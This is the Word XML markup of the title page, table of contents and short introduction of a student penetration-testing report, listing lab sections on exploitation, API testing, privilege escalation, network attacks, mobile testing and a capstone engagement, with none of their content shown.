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DE5C2" w14:textId="6E878D34" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="46DA219D" w14:textId="77777777" w:rsidR="002514C8" w:rsidRDefault="002514C8"/>
    <w:p w14:paraId="25E7A756" w14:textId="77777777" w:rsidR="002514C8" w:rsidRDefault="002514C8"/>
    <w:p w14:paraId="25A7F631" w14:textId="77777777" w:rsidR="002514C8" w:rsidRDefault="002514C8"/>
    <w:p w14:paraId="0C423820" w14:textId="77777777" w:rsidR="002514C8" w:rsidRDefault="002514C8"/>
    <w:p w14:paraId="53EC7A01" w14:textId="77777777" w:rsidR="002514C8" w:rsidRDefault="002514C8"/>
    <w:p w14:paraId="60A7A2BD" w14:textId="77777777" w:rsidR="002514C8" w:rsidRDefault="002514C8"/>
    <w:p w14:paraId="1B2B3EC9" w14:textId="77777777" w:rsidR="002514C8" w:rsidRDefault="002514C8"/>
    <w:p w14:paraId="59C1A43A" w14:textId="77777777" w:rsidR="002514C8" w:rsidRDefault="002514C8"/>
    <w:p w14:paraId="73B0135E" w14:textId="77777777" w:rsidR="002514C8" w:rsidRDefault="002514C8"/>
    <w:p w14:paraId="797577B3" w14:textId="77777777" w:rsidR="002514C8" w:rsidRDefault="002514C8"/>
    <w:p w14:paraId="3D6B47D8" w14:textId="77777777" w:rsidR="002514C8" w:rsidRDefault="002514C8"/>
    <w:p w14:paraId="157BEAE2" w14:textId="77777777" w:rsidR="002514C8" w:rsidRDefault="002514C8"/>
    <w:p w14:paraId="57C82219" w14:textId="77777777" w:rsidR="002514C8" w:rsidRDefault="002514C8"/>
    <w:p w14:paraId="70E1C677" w14:textId="77777777" w:rsidR="002514C8" w:rsidRDefault="002514C8"/>
    <w:p w14:paraId="1272B5BC" w14:textId="77777777" w:rsidR="002514C8" w:rsidRDefault="002514C8"/>
    <w:p w14:paraId="4041C3F0" w14:textId="77777777" w:rsidR="002514C8" w:rsidRDefault="002514C8"/>
    <w:p w14:paraId="39DBB588" w14:textId="77777777" w:rsidR="002514C8" w:rsidRDefault="002514C8"/>
    <w:p w14:paraId="12CD65E6" w14:textId="77777777" w:rsidR="002514C8" w:rsidRDefault="002514C8"/>
    <w:p w14:paraId="3C345E6B" w14:textId="77777777" w:rsidR="002514C8" w:rsidRDefault="002514C8"/>
    <w:p w14:paraId="4BBF21EE" w14:textId="77777777" w:rsidR="002514C8" w:rsidRDefault="002514C8"/>
    <w:p w14:paraId="1553AE33" w14:textId="24C43EBD" w:rsidR="002514C8" w:rsidRDefault="002514C8" w:rsidP="002514C8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc224731499"/>
      <w:r w:rsidRPr="002514C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>VAPT-TASK 04 Report</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="75C012DC" w14:textId="79AB359B" w:rsidR="002514C8" w:rsidRPr="002514C8" w:rsidRDefault="002514C8" w:rsidP="002514C8">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Mohammed Hussain Shaikh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44941CA4" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="011B9F44" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="1BB9A575" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="3C0D445C" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="64044E01" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="143176F3" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="48AD020C" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="303461EC" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="649D7339" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="075A3F68" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="2C3F2943" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="0E1EB6D3" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="4B587B11" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="1C7620C8" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="7AD457D1" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="3F39F1D9" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="2CFFF4AA" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="7259E7A2" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="7E1835CC" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="01D4CE5F" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:id w:val="-1825731281"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="76D23B9D" w14:textId="603D7E7A" w:rsidR="007D2C56" w:rsidRDefault="007D2C56">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="5352FE42" w14:textId="7F105281" w:rsidR="007D2C56" w:rsidRDefault="007D2C56">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc224731499" w:history="1">
            <w:r w:rsidRPr="00CD1E45">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>VAPT-TASK 04 Report</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224731499 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31F0FCEC" w14:textId="3FA72DDB" w:rsidR="007D2C56" w:rsidRDefault="007D2C56">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224731500" w:history="1">
            <w:r w:rsidRPr="00CD1E45">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Introduction</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224731500 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0523C680" w14:textId="3B0F348C" w:rsidR="007D2C56" w:rsidRDefault="007D2C56">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224731501" w:history="1">
            <w:r w:rsidRPr="00CD1E45">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Advanced Exploitation Lab</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224731501 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4882CB08" w14:textId="5F37E877" w:rsidR="007D2C56" w:rsidRDefault="007D2C56">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224731502" w:history="1">
            <w:r w:rsidRPr="00CD1E45">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>API Security Testing Lab</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224731502 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5CB3C407" w14:textId="28C02CA5" w:rsidR="007D2C56" w:rsidRDefault="007D2C56">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224731503" w:history="1">
            <w:r w:rsidRPr="00CD1E45">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Privilege Escalation and Persistence Lab</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224731503 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="77741D60" w14:textId="3EF07E1B" w:rsidR="007D2C56" w:rsidRDefault="007D2C56">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224731504" w:history="1">
            <w:r w:rsidRPr="00CD1E45">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Network Protocol Attacks Lab</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224731504 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C97EE1A" w14:textId="6A03694A" w:rsidR="007D2C56" w:rsidRDefault="007D2C56">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224731505" w:history="1">
            <w:r w:rsidRPr="00CD1E45">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mobile Application Testing Lab</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224731505 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B962999" w14:textId="19BB5FBA" w:rsidR="007D2C56" w:rsidRDefault="007D2C56">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224731506" w:history="1">
            <w:r w:rsidRPr="00CD1E45">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Capstone Project: Full VAPT Engagement</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224731506 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3AC6975E" w14:textId="683DA345" w:rsidR="007D2C56" w:rsidRDefault="007D2C56">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224731507" w:history="1">
            <w:r w:rsidRPr="00CD1E45">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Lessons Learnt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224731507 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7A45FBEE" w14:textId="1FAD8E6C" w:rsidR="007D2C56" w:rsidRDefault="007D2C56">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="7338D65E" w14:textId="6684BC72" w:rsidR="00F36846" w:rsidRDefault="00F36846">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFDBE58" w14:textId="7B9ADB0F" w:rsidR="00C776D2" w:rsidRDefault="00CA1C9E" w:rsidP="00CA1C9E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc224731500"/>
      <w:r w:rsidRPr="00CA1C9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="5E6F7555" w14:textId="2FD62FA0" w:rsidR="00CA1C9E" w:rsidRDefault="00113A14" w:rsidP="00CA1C9E">
      <w:r w:rsidRPr="00113A14">
        <w:t>In this report I am going to explain the below findings with the help of screenshots</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7565043A" w14:textId="77777777" w:rsidR="00C77E9B" w:rsidRDefault="00C77E9B" w:rsidP="00CA1C9E"/>
    <w:p w14:paraId="2FED8177" w14:textId="76E6B5B2" w:rsidR="00113A14" w:rsidRDefault="002D0BAB" w:rsidP="00D933CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D0BAB">
        <w:t>Advanced Exploitation Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1400BC3F" w14:textId="54064CB7" w:rsidR="002D0BAB" w:rsidRDefault="002D0BAB" w:rsidP="00D933CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D0BAB">
        <w:t>API Security Testing Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB4E35B" w14:textId="3C4A5F59" w:rsidR="002D0BAB" w:rsidRDefault="002D0BAB" w:rsidP="00D933CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D0BAB">
        <w:t>Privilege Escalation and Persistence Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3181294E" w14:textId="5017937D" w:rsidR="002D0BAB" w:rsidRDefault="002D0BAB" w:rsidP="00D933CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D0BAB">
        <w:t>Network Protocol Attacks Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C63B38" w14:textId="22194C53" w:rsidR="002D0BAB" w:rsidRDefault="002D0BAB" w:rsidP="00D933CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D0BAB">
        <w:t>Mobile Application Testing Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1645CE" w14:textId="598B17F5" w:rsidR="002D0BAB" w:rsidRPr="00CA1C9E" w:rsidRDefault="002D0BAB" w:rsidP="00D933CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D0BAB">
        <w:t>Capstone Project: Full VAPT Engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307C19C7" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="23F5AFAD" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="23614529" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="65A6EA0B" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="4F6D9205" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="3987A47B" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="23BDD448" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="4485A094" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="556E201C" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="7CD2C3E9" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="3CB2B782" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="2F36C56D" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="6340C036" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="461ABABF" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="0A7B1725" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="2F338D2E" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="67BBF407" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="308D93F9" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="427292B8" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="40737FD3" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="29FB9978" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="343B65F0" w14:textId="77777777" w:rsidR="00C776D2" w:rsidRDefault="00C776D2"/>
    <w:p w14:paraId="1BF7EAA1" w14:textId="77777777" w:rsidR="000B17E2" w:rsidRPr="000B17E2" w:rsidRDefault="000B17E2" w:rsidP="000B17E2"/>
    <w:p w14:paraId="05D98D8A" w14:textId="77777777" w:rsidR="000B17E2" w:rsidRPr="000B17E2" w:rsidRDefault="000B17E2" w:rsidP="000B17E2"/>
    <w:p w14:paraId="52D2617F" w14:textId="77777777" w:rsidR="000B17E2" w:rsidRPr="000B17E2" w:rsidRDefault="000B17E2" w:rsidP="000B17E2"/>
